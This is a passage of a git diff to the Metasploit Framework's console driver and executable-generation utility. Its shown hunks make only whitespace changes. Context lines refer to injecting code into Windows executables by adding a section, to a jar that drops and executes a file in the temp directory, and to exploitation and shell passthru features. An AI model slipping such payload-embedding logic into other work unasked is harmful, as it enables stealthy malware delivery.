 if not @junit_output_path raise RuntimeError, "No output path, call junit_setup() first" end
-
+
 data ||= framework.inspect.to_s
-
+
 e = REXML::Element.new("testsuite")
-
+
 c = REXML::Element.new("testcase") c.attributes["classname"] = "msfrc" c.attributes["name"] = tname
-
+
 f = REXML::Element.new("failure") f.attributes["type"] = ftype
-
- f.text = data
+
+ f.text = data
 c << f e << c
-
- bname = ( ::File.basename(self.active_resource || "msfrpc") + "_" + tname ).gsub(/[^A-Za-z0-9\.\_]/, '')
+
+ bname = ( ::File.basename(self.active_resource || "msfrpc") + "_" + tname ).gsub(/[^A-Za-z0-9\.\_]/, '')
 bname << "_" + Digest::MD5.hexdigest(ftype)
-
+
 fname = ::File.join(@junit_output_path, "#{bname}.xml") cnt = 0 while ::File.exists?( fname ) cnt += 1 fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml")
- end
-
+ end
+
 ::File.open(fname, "w") do |fd| fd.write(e.to_s) end
-
+
 print_error("Test Error: #{tname} - #{ftype} - #{data}") end
-
+
 # # Emit a jUnit XML output file and throw a fatal exception #
@@ -275,7 +275,7 @@ class Driver < Msf::Ui::Driver print_error("Exiting") run_single("exit -y") end
-
+
 # # Loads configuration that needs to be analyzed before the framework # instance is created.
@@ -343,18 +343,18 @@ class Driver < Msf::Ui::Driver path ||= File.join(Msf::Config.config_directory, 'msfconsole.rc') return if not ::File.readable?(path) resource_file = ::File.read(path)
-
+
 self.active_resource = resource_file
-
+
 # Process ERB directives first
- print_status "Processing #{path} for ERB directives."
+ print_status "Processing #{path} for ERB directives."
 erb = ERB.new(resource_file) processed_resource = erb.result(binding) lines = processed_resource.each_line.to_a bindings = {} while lines.length > 0
-
+
 line = lines.shift break if not line line.strip!
@@ -393,8 +393,8 @@ class Driver < Msf::Ui::Driver run_single(line) end end
-
- self.active_resource = nil
+
+ self.active_resource = nil
 end #
@@ -481,7 +481,7 @@ class Driver < Msf::Ui::Driver when "loglevel" handle_loglevel(val) if (glob) when "prompt"
- update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
+ update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
 when "promptchar" update_prompt(framework.datastore['Prompt'], val, true) end
@@ -522,7 +522,7 @@ class Driver < Msf::Ui::Driver # The active resource file being processed by the driver # attr_accessor :active_resource
-
+
 # # If defanged is true, dangerous functionality, such as exploitation, irb, # and command shell passthru is disabled. In this case, an exception is
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 607ad68a21..d87e00f4ee 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -127,7 +127,7 @@ require 'digest/sha1' raise RuntimeError, 'NOTE: using the substitution method means no inject support' end
- # use
+ # use
 return self.to_win32pe_exe_sub(framework, code, opts) end
@@ -152,7 +152,7 @@ require 'digest/sha1' cert_entry = pe.hdr.opt['DataDirectory'][4] #if the cert is the only thing past the sections, we can handle. if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
- endjunk = false
+ endjunk = false
 end #try to inject code into executable by adding a section without affecting executable behavior
@@ -937,7 +937,7 @@ require 'digest/sha1' end # Creates a jar file that drops the provided +exe+ into a random file name
- # in the system's temp dir and executes it.
+ # in the system's temp dir and executes it.
 # # See also: +Msf::Core::Payload::Java+ #
@@ -1675,15 +1675,15 @@ require 'digest/sha1' return true if not ::File.exists?(path) begin
- data = ::File.read(path)
+ data = ::File.read(path)
 if Digest::SHA1.hexdigest(data) != "3395856ce81f2b7382dee72602f798b642f14140" return true end
-
+
 rescue ::Exception return true end
-
+
 false end